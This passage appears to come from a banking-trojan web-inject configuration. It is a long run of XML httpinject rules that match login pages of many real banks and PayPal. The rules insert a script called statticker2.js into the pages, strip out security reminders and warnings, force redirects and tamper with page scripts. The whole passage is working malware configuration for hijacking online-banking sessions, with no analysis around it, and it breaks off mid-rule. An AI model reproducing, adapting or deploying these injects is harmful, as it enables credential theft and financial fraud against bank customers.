538. </httpinject>
539. <httpinject>
540. <conditions>
541. <url type="allow" onpost="1" onget="1" modifiers="">^https://clientlogin\.ibb\.ubs\.com/login(\?|$)</url>
542. </conditions>
543. <actions>
544. <modify>
545. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
546. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
547. </modify>
548. </actions>
549. </httpinject>
550. <httpinject>
551. <conditions>
552. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.*/fi\d+/bb/logon</url>
553. </conditions>
554. <actions>
555. <modify>
556. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
557. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
558. </modify>
559. </actions>
560. </httpinject>
561. <httpinject>
562. <conditions>
563. <url type="allow" onpost="1" onget="1" modifiers="U">^https://bbo\.1stsource\.com/login\.cfm</url>
564. </conditions>
565. <actions>
566. <modify>
567. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
568. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
569. </modify>
570. </actions>
571. </httpinject>
572. <httpinject>
573. <conditions>
574. <url type="allow" onpost="1" onget="1" modifiers="U">^https://smallbusinessonline\.bbt\.com/auth/pwd\.tb</url>
575. </conditions>
576. <actions>
577. <modify>
578. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
579. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
580. </modify>
581. </actions>
582. </httpinject>
583. <httpinject>
584. <conditions>
585. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\d*\.harrisbank\.com/(HOB/retail/logon/psohobdecidelogon|)</url>
586. </conditions>
587. <actions>
588. <modify>
589. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
590. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
591. </modify>
592. </actions>
593. </httpinject>
594. <httpinject>
595. <conditions>
596. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://commercial\.bnc\.ca/auth/Login</url>
597. </conditions>
598. <actions>
599. <modify>
600. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
601. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
602. </modify>
603. <modify>
604. <pattern modifiers="i"><![CDATA[(/scripts/sbiInput\d*\.js"></script>)]]></pattern>
605. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript">xdom.Events.Keys.ENTER = 27;</script>]]></replacement>
606. </modify>
607. </actions>
608. </httpinject>
609. <httpinject>
610. <conditions>
611. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.bxs\.com/</url>
612. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
613. </conditions>
614. <actions>
615. <modify>
616. <pattern modifiers="i"><![CDATA[(</(body|html)>)]]></pattern>
617. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
618. </modify>
619. </actions>
620. </httpinject>
621. <httpinject>
622. <conditions>
623. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://cashproonline\.bankofamerica\.com/AuthenticationFrameworkWeb/cpo/login/public/
624. </url>
625. </conditions>
626. <actions>
627. <modify>
628. <pattern modifiers="Ui"><![CDATA[(</html>)]]></pattern>
629. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
630. </modify>
631. </actions>
632. </httpinject>
633. <httpinject>
634. <conditions>
635. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bankofthewest\.com/K\d+/(|sa\d+/login\.jsp|index\.html)(\?|$)</url>
636. </conditions>
637. <actions>
638. <modify>
639. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
640. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
641. </modify>
642. </actions>
643. </httpinject>
644. <httpinject>
645. <conditions>
646. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.brannenbanks\.com/BrannenBank/PassmarkSignIn\.faces</url>
647. </conditions>
648. <actions>
649. <modify>
650. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
651. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
652. </modify>
653. </actions>
654. </httpinject>
655. <httpinject>
656. <conditions>
657. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(vip\.|)btcchina\.com/bbs/index\.php</url>
658. </conditions>
659. <actions>
660. <modify>
661. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
662. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
663. </modify>
664. <modify>
665. <pattern modifiers="i"><![CDATA[Login\.init\(\);]]></pattern>
666. <replacement><![CDATA[]]></replacement>
667. </modify>
668. </actions>
669. </httpinject>
670. <httpinject>
671. <conditions>
672. <url type="allow" onpost="1" onget="1" modifiers="">^https://wired\d*\.businessmanager\.com/signon/signon\.do(\?|$)</url>
673. </conditions>
674. <actions>
675. <modify>
676. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
677. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
678. </modify>
679. </actions>
680. </httpinject>
681. <httpinject>
682. <conditions>
683. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.cibeg\.com/MCP</url>
684. </conditions>
685. <actions>
686. <modify>
687. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
688. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
689. </modify>
690. </actions>
691. </httpinject>
692. <httpinject>
693. <conditions>
694. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/cmserver/.*verify\.cfm</url>
695. </conditions>
696. <actions>
697. <modify>
698. <pattern modifiers="imsU"><![CDATA[(<form.+method\="post".*>)]]></pattern>
699. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
700. </modify>
701. </actions>
702. </httpinject>
703. <httpinject>
704. <conditions>
705. <url type="allow" onpost="1" onget="1" modifiers="">^https://business\-eb\.ibanking\-services\.com/K1/(sb\_login|index)\.jsp(\?|$)</url>
706. </conditions>
707. <actions>
708. <modify>
709. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
710. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
711. </modify>
712. <modify>
713. <pattern modifiers="Umsg"><![CDATA[<font color="red">.*</font>]]></pattern>
714. <replacement />
715. </modify>
716. </actions>
717. </httpinject>
718. <httpinject>
719. <conditions>
720. <url type="allow" onpost="1" onget="1" modifiers="">^https://.+/pub/html/(rsa/|pt/RSApm/|)(login|LoginRSAID|loginID)\.html$
721. </url>
722. </conditions>
723. <actions>
724. <modify>
725. <pattern modifiers="msi"><![CDATA[(</html>)]]></pattern>
726. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
727. </modify>
728. </actions>
729. </httpinject>
730. <httpinject>
731. <conditions>
732. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.membersaccounts\.com/SELFSERVICE/Login\.aspx</url>
733. </conditions>
734. <actions>
735. <modify>
736. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
737. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
738. </modify>
739. </actions>
740. </httpinject>
741. <httpinject>
742. <conditions>
743. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.cencorpcu\.com/secure/secure\_logon\.asp(\?|$)</url>
744. </conditions>
745. <actions>
746. <modify>
747. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
748. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
749. </modify>
750. </actions>
751. </httpinject>
752. <httpinject>
753. <conditions>
754. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https?://www.citibank.com/us/citibusinessonline/</url>
755. </conditions>
756. <actions>
757. <modify>
758. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
759. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>
760. <script type="text/javascript" language="JavaScript">
761. // redirect loop :(
762. //if (window.location.protocol != "https:")
763. window.location.href = "https:" + window.location.href.substring(window.location.protocol.length);
764. </script>
765. ]]></replacement>
766. </modify>
767. </actions>
768. </httpinject>
769. <httpinject>
770. <conditions>
771. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://online\.citibank\.com/</url>
772. </conditions>
773. <actions>
774. <modify>
775. <pattern modifiers="imsgU"><![CDATA[href="https://businessaccess.citibank.citigroup.com[^"]*"]]></pattern>
776. <replacement><![CDATA[href="http://www.citibank.com/us/citibusinessonline/"]]></replacement>
777. </modify>
778. </actions>
779. </httpinject>
780. <httpinject>
781. <conditions>
782. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fcsolb\.com/cb/pages/jsp\-ns/</url>
783. </conditions>
784. <actions>
785. <modify>
786. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
787. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
788. </modify>
789. </actions>
790. </httpinject>
791. <httpinject>
792. <conditions>
793. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d+\.comerica\.com/</url>
794. <url type="deny" onpost="0" onget="1" modifiers="U">^https://www\d+\.comerica\.com/.+\.(gif|png|jpg|js|css)($|\?)</url>
795. </conditions>
796. <actions>
797. <modify>
798. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
799. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
800. </modify>
801. </actions>
802. </httpinject>
803. <httpinject>
804. <conditions>
805. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.conexus\.ca/Business/OnlineBanking/Accounts/</url>
806. </conditions>
807. <actions>
808. <modify>
809. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
810. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
811. </modify>
812. </actions>
813. </httpinject>
814. <httpinject>
815. <conditions>
816. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://[\w\-]+\.corpower\.org/SecureLogonMultiAuth\.aspx($|\?)</url>
817. </conditions>
818. <actions>
819. <modify>
820. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
821. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
822. </modify>
823. </actions>
824. </httpinject>
825. <httpinject>
826. <conditions>
827. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://(www\.|)cashanalyzer\.com/(caloadbalance\.aspx|cgi\-bin/[1-2a-z]+\.dll)(/|\?|$)</url>
828. </conditions>
829. <actions>
830. <modify>
831. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
832. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
833. </modify>
834. <modify>
835. <pattern modifiers="Ums"><![CDATA[class="CA_redText".*>(?<inject>.*)</div>]]></pattern>
836. <replacement />
837. </modify>
838. </actions>
839. </httpinject>
840. <httpinject>
841. <conditions>
842. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.e\-closingsecured\.com:\d+/scripts/spiis\.dll/its\-itec/itec\_login</url>
843. </conditions>
844. <actions>
845. <modify>
846. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
847. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
848. </modify>
849. </actions>
850. </httpinject>
851. <httpinject>
852. <conditions>
853. <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)e\-moneyger\.com/wps/myportal/?(|/\!ut/p/.+/)$</url>
854. </conditions>
855. <actions>
856. <modify>
857. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
858. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
859. </modify>
860. </actions>
861. </httpinject>
862. <httpinject>
863. <conditions>
864. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/ebc_ebc1961/</url>
865. </conditions>
866. <actions>
867. <modify>
868. <pattern modifiers="Ui"><![CDATA[(</form.*>)]]></pattern>
869. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
870. </modify>
871. <modify>
872. <pattern modifiers="Ui"><![CDATA[(onload="loadPassmark\(\)\;)]]></pattern>
873. <replacement><![CDATA[\1document.cookie='nmRef='+escape(window.top.document.referrer);]]></replacement>
874. </modify>
875. </actions>
876. </httpinject>
877. <httpinject>
878. <conditions>
879. <url type="allow" onpost="1" onget="1" modifiers="U">^https://express\.53\.com/portal/auth/login/Login</url>
880. </conditions>
881. <actions>
882. <modify>
883. <pattern modifiers="Ui"><![CDATA[(<body.*>)]]></pattern>
884. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
885. </modify>
886. </actions>
887. </httpinject>
888. <httpinject>
889. <conditions>
890. <url type="allow" onpost="1" onget="1" modifiers="U">^https://direct\.53.com/direct/logon53Direct\.jsp</url>
891. </conditions>
892. <actions>
893. <modify>
894. <pattern modifiers="sm"><![CDATA[^(?<inject>.*)$]]></pattern>
895. <replacement><![CDATA[<html><head><title>Redirect</title></head>
896. <body>
897. <script language="JavaScript">window.top.location.href='https://express.53.com/portal/auth/login/Login'</script>
898. <a href="https://express.53.com/portal/auth/login/Login">redirect...</a>
899. </body></html>]]></replacement>
900. </modify>
901. </actions>
902. </httpinject>
903. <httpinject>
904. <conditions>
905. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bb\-fire\.com/SignOn/</url>
906. </conditions>
907. <actions>
908. <modify>
909. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
910. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
911. </modify>
912. </actions>
913. </httpinject>
914. <httpinject>
915. <conditions>
916. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.ffinonline\.com/ff.*online1/(authentication/Login\.aspx|Accounts/AccountOverview\.aspx)</url>
917. </conditions>
918. <actions>
919. <modify>
920. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
921. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
922. </modify>
923. </actions>
924. </httpinject>
925. <httpinject>
926. <conditions>
927. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://globalaccess\.firstglobal\-bank\.com/internetbanking/ENULogin\.jsp</url>
928. </conditions>
929. <actions>
930. <modify>
931. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
932. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
933. </modify>
934. </actions>
935. </httpinject>
936. <httpinject>
937. <conditions>
938. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fnbstl\.com/business/(cts\_security\_precheck|.+\.jsp)</url>
939. </conditions>
940. <actions>
941. <modify>
942. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
943. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
944. </modify>
945. </actions>
946. </httpinject>
947. <httpinject>
948. <conditions>
949. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.efirstbank\.com/centralAuth/jsp/main/Logon\.faces(\?|$)</url>
950. </conditions>
951. <actions>
952. <modify>
953. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
954. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
955. </modify>
956. </actions>
957. </httpinject>
958. <httpinject>
959. <conditions>
960. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.firstmeritib\.com</url>
961. </conditions>
962. <actions>
963. <modify>
964. <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
965. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
966. </modify>
967. </actions>
968. </httpinject>
969. <httpinject>
970. <conditions>
971. <url type="allow" onpost="1" onget="1" modifiers="">^https://.*secure\.fundsxpress\.com/piles/fxweb\.pile/(fx|second\_auth.*|custom\_login)(\?|$)</url>
972. </conditions>
973. <actions>
974. <modify>
975. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
976. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
977. </modify>
978. </actions>
979. </httpinject>
980. <httpinject>
981. <conditions>
982. <url type="allow" onpost="1" onget="1" modifiers="iU">^^https://netbanking\.hdfcbank\.com/netbanking/</url>
983. </conditions>
984. <actions>
985. <modify>
986. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
987. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
988. </modify>
989. </actions>
990. </httpinject>
991. <httpinject>
992. <conditions>
993. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessonline\.huntington\.com/BOLHome/BusinessOnlineLogin\.aspx</url>
994. </conditions>
995. <actions>
996. <modify>
997. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
998. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
999. </modify>
1000. </actions>
1001. </httpinject>
1002. <httpinject>
1003. <conditions>
1004. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.huntington\.com/scripts/onlinebanking\.js</url>
1005. </conditions>
1006. <actions>
1007. <modify>
1008. <pattern modifiers="msU"><![CDATA[(inputCheckBusiness.*else {)]]></pattern>
1009. <replacement><![CDATA[\1top.location.href="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx"; return false;]]></replacement>
1010. </modify>
1011. </actions>
1012. </httpinject>
1013. <httpinject>
1014. <conditions>
1015. <url type="allow" onpost="1" onget="1" modifiers="U">^https://access\.jpmorgan\.com/jpmalogon</url>
1016. </conditions>
1017. <actions>
1018. <modify>
1019. <pattern modifiers="sA"><![CDATA[(.+</body>)]]></pattern>
1020. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1021. </modify>
1022. </actions>
1023. </httpinject>
1024. <httpinject>
1025. <conditions>
1026. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.jefferson\-bank\.com/business/j\_security\_check($|\?)</url>
1027. </conditions>
1028. <actions>
1029. <modify>
1030. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1031. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1032. </modify>
1033. </actions>
1034. </httpinject>
1035. <httpinject>
1036. <conditions>
1037. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[\w\.\-]+\.(wblnk|blilk)\.com/Core/Authentication/MFAPassword\.aspx</url>
1038. <url type="deny" onpost="1" onget="1" modifiers="iU">^https://www\.idbaccess\.blilk\.com/core/Authentication/.*</url>
1039. </conditions>
1040. <actions>
1041. <modify>
1042. <pattern modifiers="imsU"><![CDATA[(<body.*>)]]></pattern>
1043. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1044. </modify>
1045. </actions>
1046. </httpinject>
1047. <httpinject>
1048. <conditions>
1049. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.idbaccess\.blilk\.com/core/Authentication/.*</url>
1050. </conditions>
1051. <actions>
1052. <modify>
1053. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1054. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="idbaccess/scripts/statticker2.js"></script>\1]]></replacement>
1055. </modify>
1056. </actions>
1057. </httpinject>
1058. <httpinject>
1059. <conditions>
1060. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ktt\.key\.com/ktt/cmd/logon]]></url>
1061. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
1062. </conditions>
1063. <actions>
1064. <modify>
1065. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1066. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1067. </modify>
1068. </actions>
1069. </httpinject>
1070. <httpinject>
1071. <conditions>
1072. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ktt\.key\.com/ktt/cmd/logonFromKeyComNew]]></url>
1073. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
1074. </conditions>
1075. <actions>
1076. <modify>
1077. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1078. <replacement><![CDATA[\1
1079. <style type="text/css">
1080. body { visibility: hidden; }
1081. </style>
1082. <script type="text/javascript">
1083. top.window.location = 'https://ktt.key.com/ktt/cmd/logon';
1084. </script>]]></replacement>
1085. </modify>
1086. </actions>
1087. </httpinject>
1088. <httpinject>
1089. <conditions>
1090. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessportal\.mibank\.com/oracleAccessManager/securid\-forms\-adforest/.*login.*\.html(\?|$)</url>
1091. </conditions>
1092. <actions>
1093. <modify>
1094. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1095. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1096. </modify>
1097. </actions>
1098. </httpinject>
1099. <httpinject>
1100. <conditions>
1101. <url type="allow" onpost="1" onget="1" modifiers="">^https://commercialservices\.mandtbank\.com/</url>
1102. </conditions>
1103. <actions>
1104. <modify>
1105. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1106. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1107. </modify>
1108. <modify>
1109. <pattern modifiers=""><![CDATA[Internet Security Reminder]]></pattern>
1110. <replacement><![CDATA[]]></replacement>
1111. </modify>
1112. <modify>
1113. <pattern modifiers="sU"><![CDATA[<font color=black size="1">.*</div>]]></pattern>
1114. <replacement><![CDATA[</div>]]></replacement>
1115. </modify>
1116. <modify>
1117. <pattern modifiers="sU"><![CDATA[<hr .*>]]></pattern>
1118. <replacement><![CDATA[]]></replacement>
1119. </modify>
1120. </actions>
1121. </httpinject>
1122. <httpinject>
1123. <conditions>
1124. <url type="allow" onpost="1" onget="1" modifiers="">^https://business\.memberdirect\.net/(servlet/Logon|business/default\.jsp)(\?|$)</url>
1125. </conditions>
1126. <actions>
1127. <modify>
1128. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1129. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1130. </modify>
1131. </actions>
1132. </httpinject>
1133. <httpinject>
1134. <conditions>
1135. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mercantilcbonline\.com/secure/banking/(logon|individualLogon)</url>
1136. </conditions>
1137. <actions>
1138. <modify>
1139. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1140. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1141. </modify>
1142. </actions>
1143. </httpinject>
1144. <httpinject>
1145. <conditions>
1146. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.ml\.com/ClientFederation/Loginwidget\.aspx</url>
1147. </conditions>
1148. <actions>
1149. <modify>
1150. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1151. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1152. </modify>
1153. </actions>
1154. </httpinject>
1155. <httpinject>
1156. <conditions>
1157. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.metrobankdirect\.com/corp_login_page\.asp</url>
1158. </conditions>
1159. <actions>
1160. <modify>
1161. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1162. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1163. </modify>
1164. </actions>
1165. </httpinject>
1166. <httpinject>
1167. <conditions>
1168. <url type="allow" onpost="1" onget="1" modifiers="U">^https://cashmanager\.mizuhoe\-treasurer\.com/mz/servlet/SLogin\?</url>
1169. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://otp\.ffrontier\.com/gcms/(FFrontier|user\.login)(\?|$)</url>
1170. </conditions>
1171. <actions>
1172. <modify>
1173. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1174. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1175. </modify>
1176. </actions>
1177. </httpinject>
1178. <httpinject>
1179. <conditions>
1180. <url type="allow" onpost="1" onget="1" modifiers="U">^https://businessonline\.mutualofomahabank\.com/cb/pages/jsp\-ns/login\.jsp</url>
1181. </conditions>
1182. <actions>
1183. <modify>
1184. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1185. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1186. </modify>
1187. </actions>
1188. </httpinject>
1189. <httpinject>
1190. <conditions>
1191. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://(www\d*|cm)\.netteller\.com/(login|cm)2008/Authentication/Views/\S+\.aspx(\?|$)</url>
1192. </conditions>
1193. <actions>
1194. <modify>
1195. <pattern modifiers="msU"><![CDATA[(</form.*>)]]></pattern>
1196. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1197. </modify>
1198. </actions>
1199. </httpinject>
1200. <httpinject>
1201. <conditions>
1202. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://server\d{1,3}\.cey\-ebanking\.com/CLKCCM/.+/passmark.*/.+\.asp($|\?)</url>
1203. </conditions>
1204. <actions>
1205. <modify>
1206. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
1207. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1208. </modify>
1209. </actions>
1210. </httpinject>
1211. <httpinject>
1212. <conditions>
1213. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://server\d{1,3}\.cey\-ebanking\.com/CLKCCM/.+/OOBA/OOBALogin\.asp($|\?)</url>
1214. </conditions>
1215. <actions>
1216. <modify>
1217. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
1218. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1219. </modify>
1220. </actions>
1221. </httpinject>
1222. <httpinject>
1223. <conditions>
1224. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/onlineserv/CM/($|index\.cgi)</url>
1225. </conditions>
1226. <actions>
1227. <modify>
1228. <pattern modifiers="imsU"><![CDATA[(action="index.cgi".+</form>)]]></pattern>
1229. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1230. </modify>
1231. </actions>
1232. </httpinject>
1233. <httpinject>
1234. <conditions>
1235. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.+/onlineserv/CM/adminLogin\.cgi</url>
1236. </conditions>
1237. <actions>
1238. <modify>
1239. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
1240. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="onlineservadmin/scripts/statticker2.js"></script>]]></replacement>
1241. </modify>
1242. </actions>
1243. </httpinject>
1244. <httpinject>
1245. <conditions>
1246. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.pnc\.com/.*corporate\-and\-institutional</url>
1247. </conditions>
1248. <actions>
1249. <modify>
1250. <pattern modifiers="msU"><![CDATA[(</html>)]]></pattern>
1251. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1252. </modify>
1253. </actions>
1254. </httpinject>
1255. <httpinject>
1256. <conditions>
1257. <url type="allow" onpost="1" onget="1" modifiers="i">^https://.*(/PassMark|RSAToken).*\.aspx($|\?)</url>
1258. </conditions>
1259. <actions>
1260. <modify>
1261. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1262. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="passmark/scripts/statticker2.js"></script>]]></replacement>
1263. </modify>
1264. </actions>
1265. </httpinject>
1266. <httpinject>
1267. <conditions>
1268. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.paypal\.com/[\w\-/]*($|cgi\-bin/webscr\?)</url>
1269. </conditions>
1270. <actions>
1271. <modify>
